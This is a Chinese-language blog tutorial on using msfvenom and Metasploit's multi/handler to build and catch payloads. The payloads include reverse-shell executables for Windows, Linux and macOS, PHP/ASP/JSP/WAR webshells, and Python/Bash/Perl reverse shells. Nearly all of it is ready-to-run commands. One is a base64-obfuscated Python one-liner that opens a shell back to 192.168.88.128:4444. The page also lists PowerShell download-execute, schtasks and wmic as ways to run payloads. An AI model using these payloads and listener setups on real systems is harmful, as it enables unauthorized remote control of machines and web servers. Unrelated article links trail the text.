msf作为一款强大的漏洞检测工具,如何生成适用于msf的payload以及如何利用是使用msf的关键,今天就主要记录一下常用的payload以及如何使用。生成payload使用的工具是MSFVenom,下面看看他的帮助信息。

在kali下可以使用如下命令列出MSFVenom可以生成的payload列表:

msfvenom -l

生成二进制文件

关于二进制文件,主要介绍适用于Windows、linux、mac操作系统的payload生成与利用。

Windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

Linux

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

Mac

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address>LPORT=<Your Port to Connect On> -f macho > shell.macho

如何利用

针对这个部分就以Windows为例,使用上面的命令生成一个exe的payload,命令如下:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.88.128 LPORT=4444 -f exe > shell.exe

复制shell.exe到Windows机器,然后kali下开启msf使用如下命令监听4444端口:

  1. msfconsole
  2. use exploit/multi/handler
  3. set PAYLOAD windows/meterpreter/reverse_tcp
  4. set LHOST 192.168.88.128
  5. set LPORT 4444
  6. set ExitOnSession false
  7. exploit -j -z

执行完之后在Windows下执行shell.exe,然后结果如图:

在这里既然使用到了在Windows下执行应用程序,我们就大概盘点一下在Windows执行应用程序的几种方式:

  • 双击运行

  • cmd下运行exe

  • 利用Powershell远程下载执行

  • 利用at或schtasks设置计划任务执行

  • 利用wmic远程命令执行

  • 其他的方式请各位补充

生成webshell脚本

在做web渗透的时候,经常会用到webshell,我们经常用的一句话用菜刀连接,如何使用MSFVenom生成一个可以用msf操作的webshell呢?

PHP

  1. msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
  2. cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

ASP

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war

如何利用

下面以php为例做一下测试,使用以下命令生成一个webshell:

msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.88.128 LPORT=4444 -f raw > shell.php

在kali上使用msf执行下面的命令,监听端口4444:

  1. msfconsole
  2. use exploit/multi/handler
  3. set PAYLOAD php/meterpreter_reverse_tcp
  4. set LHOST 192.168.88.128
  5. set LPORT 4444
  6. set ExitOnSession false
  7. exploit -j -z

将shell.php放在web目录下,使用浏览器访问,或者使用以下命令执行:

php shell.php

脚本shell

关于使用脚本反弹shell的方式,主要以python、bash、perl为例。

Python

msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py

Bash

msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh

Perl

msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl

如何使用

下面就以Python为例做一下测试,使用以下命令生成一个脚本:

msfvenom -p cmd/unix/reverse_python LHOST=192.168.88.128 LPORT=4444 -f raw > shell.py

在kali上使用msf执行下面的命令,监听端口4444:

  1. msfconsole
  2. use exploit/multi/handler
  3. set PAYLOAD cmd/unix/reverse_python
  4. set LHOST 192.168.88.128
  5. set LPORT 4444
  6. set ExitOnSession false
  7. exploit -j -z

然后复制shell.py中的内容在linux命令行下执行,如下:

python -c"exec('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zICAgICAgOyAgICBob3N0PSIxOTIuMTY4Ljg4LjEyOCIgICAgICA7ICAgIHBvcnQ9NDQ0NCAgICAgIDsgICAgcz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSkgICAgICA7ICAgIHMuY29ubmVjdCgoaG9zdCxwb3J0KSkgICAgICA7ICAgIG9zLmR1cDIocy5maWxlbm8oKSwwKSAgICAgIDsgICAgb3MuZHVwMihzLmZpbGVubygpLDEpICAgICAgOyAgICBvcy5kdXAyKHMuZmlsZW5vKCksMikgICAgICA7ICAgIHA9c3VicHJvY2Vzcy5jYWxsKCIvYmluL2Jhc2giKQ=='.decode('base64'))"

结果如图:

msf常用payload相关推荐

  1. 【MSFconsole工具】下载、启动方法、msf常用基础命令、模块功能、核心命令(入门初识)

    目录 一.简介: 二.下载: 2.1.kali 2.2.官网: 2.3.GitHub: 三.启动方法 四.msf常用基础命令 五.msf结构 六. 核心命令: 一.简介: 很容易地获取.开发并对计算机 ...

  2. msf注入payload

    msf注入payload bash 参考文章 bash use exploit/windows/local/payload_inject set payload windows/meterpreter ...

  3. msf生成payload大全

    前言 作者简介:不知名白帽,网络安全学习者. 博客主页:https://blog.csdn.net/m0_63127854?type=blog CTF-专栏:https://blog.csdn.net ...

  4. 【Metasploit总结】之【MSF常用命令及信息收集】

    操作系统:kali Linux2020.3 smfconsole常用命令 msfconsole下可以直接使用终端命令,如ping等 msfdb start # 启动msf数据库,msf数据库默认使用的 ...

  5. 【Metasploit】MSF常用命令

    Meterpreter基本概念 Meterpreter是Metasploit框架中的一个扩展模块,在攻击成 功以后给我们返回一个控制通道,是metsploit后渗透必不可少的 ,它具有强大的功能,包括 ...

  6. msf常用模块功能整理

    更新中 一.基础: shell中直接输入msfconsole开始运行 use +模块路径 使用模块 search+模块关键字 用来搜索模块 back 返回主界面 模块中: info 查看模块信息 sh ...

  7. 永恒之蓝(MS17-010)漏洞复现及msf常用渗透命令

    环境部署 靶机:win7(172.168.100.158) 工具机:kali,nessus 攻击步骤 1.nessus扫描靶机 2.根据扫描结果查看靶机漏洞 3.发现靶机存在永恒之蓝(MS17-010 ...

  8. MSF常用的监听模块命令

    msfpayload 命令 帮助 msfpayload -h 列出所有可用的***载荷 msfpayload windows/meterpreter/bind_tcp O 列出所有windows/me ...

  9. XSS常用Payload

    1.普通的 <ScRipt>alert(1)</ScRipt> 1"><ScRipt>alert(1)</ScRipt> 2.绕过htm ...

最新文章

  1. C++11中Lambda表达式的使用
  2. R语言使用caret包对GBM模型进行参数调优实战:Model Training and Parameter Tuning
  3. wordpress图片水印插件DX-Watermark
  4. strcpy和strncpy
  5. 阅读react-redux源码 - 一
  6. 复合的赋值运算符例题_Java学习:运算符的使用与注意事项
  7. Docker制作镜像(四)
  8. php验证码类Validationcode
  9. Swagger 属性名 FastJson支持,@ApiModelProperty无法序列化
  10. BZOJ 1901 洛谷 P2617 ZOJ 2112 Dynamic Rankings
  11. gxworks2软件测试对话框,超实用!GX Works2软件的启动与窗口功能应用
  12. ZigBee Zstack协议栈
  13. MacBook快捷键
  14. ❤️「Python」初阶,必看系列, 万字只为你,建议点赞收藏~❤️
  15. 驱动开发:Win10枚举完整SSDT地址表
  16. 技术岗找工作简历撰写方法
  17. 商城-下单-订单结算页
  18. icc 颜色 c语言,浅析颜色在icc中四种不同的转换方式
  19. 微信中html5获取手机号,微信小程序用户授权获取手机号(getPhoneNumber)
  20. 长虹应用商店服务器连接异常,长虹电视为什么应用商店打不开,上面显示服务器或网络异常,可是网络没问题,还显示sn异常,求解……...

热门文章

  1. Oracle数据类型-CLOB
  2. Nanoprobes丨EnzMet 用于免疫组织化学 (IHC) 和印迹
  3. android13新版本适配
  4. 中信建投计算机研究武超则,中信建投证券--计算机行业:华为投资鲲鹏产业生态,加速国产化进程(4页)-原创力文档...
  5. php和c#短信接口,C#代码示例_C#验证码短信接口 | 微米-中国领先的短信彩信接口平台服务商...
  6. Java中Runtime类详细总结
  7. 我的人生感悟---献给像我这样走在路上的人,免走弯路!
  8. 微信小程序模拟器在笔记本上input无法获取焦点,无法输入
  9. 工业互联网也迈入新的发展阶段 AI助力构建新型制造体系
  10. 第6章 Linux目录文件与系统启动知识